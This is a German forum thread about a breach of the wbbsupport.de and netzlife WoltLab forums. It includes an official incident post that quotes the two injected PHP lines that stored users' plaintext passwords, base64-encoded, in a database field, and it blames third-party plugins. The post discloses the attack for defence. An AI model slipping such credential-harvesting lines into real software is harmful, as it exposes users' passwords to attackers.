wbbsupport.de down?

  • Jeder denkt hier nur an Woltlab habe ihr vielleicht schon mal drann gedacht daß sich man sich den faulen Peter auch reinholen kann wenn man Drittentwickler Plugins installiert ausserhalb den woltlabs Store , das ist meiner Meinung nach nämlich das warscheinlichste übel, und da kann quasie alles mit eingeschleust werden. Dazu kommt dann noch wenn der Server nicht richtig konfiguriert ist könnte man theoretisch bis ins Root Verzeichnis Zugriff bekommen.

    Da gibt es haufenweise Möglichkeiten. Nicht nur Drittanbieter-Software oder eben der Server selbst.

  • Sorry, einige nur. Nicht Jeder. Ich möchte mich davon ausschließen. Danke

    Sorty korrigiert 🙈


    Da gibt es haufenweise Möglichkeiten. Nicht nur Drittanbieter-Software oder eben der Server selbst.

    stimmt schon aber das wäre meiner Meinung das naheliegendste.

  • Hallo,


    das ist leider wieder das gleiche Spiel wie damals wo wir gehackt wurden, da fangen alle an Panik zu bekommen, alle fangen an zu spekulieren und alle drängen um eine Stellung der betroffenen. Ich hab gerade mit mipu telefoniert und ich kann euch jetzt schon mal Sagen das hier das gleiche Spiel wie bei NetzLife stattfinden wird und zwar muss man hier auch wieder die Ermittlungen abwarten und sollte sich in Geduld üben.


    Für uns die den Angriff auf der eigene Seite erlebt haben ist das natürlich auch nicht schön da die Füße Still zu halten, aber so ist das nun mal.

    • Official Post

    Hallo,


    wir möchten an dieser Stelle ein wenig Licht ins Dunkle zu bringen und teilen unsere Erkenntnisse mit.

    Was genau ist passiert?

    Der Angriff auf netzlife sowie wbbsupport haben gemeinsam, dass die Systeme auf die exakt gleiche Art und Weise bösartig modifiziert wurden. Dabei wurden zwei Dateien verändert, um Passwörter im Klartext abzugreifen und in der Datenbank zu speichern. Diese Daten konnte der Angreifer über eine Modifikation in einer dritten Datei zu einem späteren Zeitpunkt auslesen und so die gesammelten Daten zu erbeuten.

    Welche Veränderungen wurden vorgenommen?

    Abgreifen des Klartext-Passwort beim Login:

    PHP: LoginForm.class.php
    $this->objectAction = new UserAction([$this->user], 'update', ['data' => ['logToken' => base64_encode($this->password)]]);
    $this->objectAction->executeAction()


    Abgreifen des Klartext-Passworts beim Ändern des Passworts in den Einstellungen:

    PHP: AccountManagementForm.class.php
    $updateParameters['logToken'] = base64_encode($this->confirmNewPassword);


    Auslesen der erbeuteten Daten zu einem späteren Zeitpunkt mittels eines speziellen Parameters, erfordert zusätzlich noch ein nur dem Angreifer bekanntes geheimes Passwort:

    Auf welche Weise wurden diese Dateien verändert?

    Die wahrscheinlichste und plausibelste Erklärung ist die Kompromittierung über ein Plugin aus einer Drittquelle, das unbemerkt bei der Installation bzw. einem Update diesen Schadcode einbaut. Dabei kann sich der Angreifer den Umstand zu Nutze machen, dass Pakete von Drittpaketservern nicht von uns überprüft werden und sich somit unserer Kontrolle entziehen.

    Wie kann ich mich vor solchen Angriffen besser schützen?

    Die Installation von Erweiterungen von Drittseiten bzw. Paketservern von Drittanbietern wird immer ein gewisses Zusatzrisiko in sich bergen. Anders als im Plugin-Store erfolgt dort keine zusätzliche Kontrolle von uns auf Stabilität und Sicherheit. Dabei muss nicht einmal der Betreiber der Drittseite selbst böse Absichten haben, es reicht aus, dass dessen System von diesem unbemerkt kompromittiert wurde und ungewollt diesen Schadcode verteilt.


    Wir investieren sehr viel Zeit und Mühe in die sorgfältige Prüfung aller hochgeladenen Dateien im Plugin-Store. Im Durchschnitt fällt jedes 3. im Plugin-Store hochgeladene Plugin auf Grund von teils gravierenden Mängeln durch die Prüfung und wird erst nach entsprechenden Korrekturen von uns freigeschaltet. Insbesondere die vorzeitige Veröffentlichung von Updates auf den eigenen Seiten von Drittentwicklern sehen wir als sehr kritisch an und hat immer wieder dazu geführt, dass Versionen verteilt wurden, die einer Prüfung im Rahmen des Plugin-Store nicht standhielt.

  • Wenn du ihn gefunden hast

    Mein Beitrag hat genau das bewirkt, was er sollte: Du hast Dich hier bemerkbar gemacht 😜. Das ist auch eine Art der 2FA...

    Gruß aus Südhessen

  • Gibt es da möglichkeiten sich zu schützen? trotz installationen von 3 Anbietern?

    Im Endeffekt musst du den Entwickler von denen du Software installierst immer Vertrauen (egal in welchem Bereich und egal wo).

    Um so mehr Quellen du hast um so mehr Angriffsmöglichkeiten hast du natürlich. Meiner Meinung nach ein Schritt in die richtige Richtung wäre z.B. der Vorschlag hier Kryptographische Absicherung von Updates

  • Darf man also darauf schließen das auch bei WBBSupport Daten geklaut wurden?

  • Auch wenn es jetzt schwer ist das rauszufinden, wäre es Intressant zu wissen, von welchem Plugin bzw. Paketserver dieser Schadecode ausgeliefert wurde.


    Ich denke mal das kann man nicht so leicht rausfinden?


    PS. Villeicht sollte Woltlab im nächsten Update vielleicht etwas einbauen um zu prüfen ob die Dateien so geändert wurden und notfalls zurucksetzen auf original zustand?

    ┌П┐(◉_◉)┌П┐

  • Wenn du welche findest bitte zur mir, mir Fehlen welche.;)

    Ich meinte Passwörter etc. ist ja dann doch sehr wahrscheinlich :D

    Auch wenn es jetzt schwer ist das rauszufinden, wäre es Intressant zu wissen, von welchem Plugin bzw. Paketserver dieser Schadecode ausgeliefert wurde.


    Ich denke mal das kann man nicht so leicht rausfinden?

    Jaein, Netzlife und Mipu könnten vergleichen, was beide installiert hatten und daraus vllt rückschlüsse ziehen?!

  • Da der Schadcode es prinzipiell erlaubt, die Klartextpasswörter auszulesen, sollte man davon ausgeben, dass die Passwörter bekannt sind.

  • Da der Schadcode es prinzipiell erlaubt, die Klartextpasswörter auszulesen, sollte man davon ausgeben, dass die Passwörter bekannt sind.

    Aber nur wenn man sich in dem Zeitraum, wo die Seite bereits kompromittiert war, auf der Seite eingeloggt hat.


    Edit: ich gehe mal davon aus, dass der Zeitraum unbekannt ist.